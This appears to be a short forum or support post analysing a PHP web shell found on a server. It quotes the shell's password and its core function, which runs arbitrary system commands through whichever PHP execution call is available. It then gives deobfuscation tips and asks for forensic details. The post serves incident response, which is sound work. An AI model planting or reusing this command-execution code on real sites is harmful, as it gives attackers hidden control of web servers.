exploit
they are using the password '4ef44b514159705a45bead8633dc8a2a'
appears to be a remote shell.
The meat:
Code:
function magic_execute($cmd)
{
$res=false;
if (function_exists('exec'))
{
@exec($cmd,$res);
$res = join("\n",$res);
}
else
if (function_exists('shell_exec'))
$res = @shell_exec($cmd);
else
if (function_exists('system'))
{
@ob_start();
@system($cmd);
$res = @ob_get_contents();
@ob_end_clean();
}
else
if(function_exists('passthru'))
{
@ob_start();
@passthru($cmd);
$res = @ob_get_contents();
@ob_end_clean();
}
else
if (@is_resource($f = @popen($cmd,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
return $res;
}
If you're curious, change the eval at the end to a print, and put an ! in front of the isset, place it in a file with <?php at the beginning and run
php filename.php
and it'll output the source.
file a ticket with where you found this, if you didn't remove it, make a note of the time on it, file permissions, ownership, etc. and I'll take a look.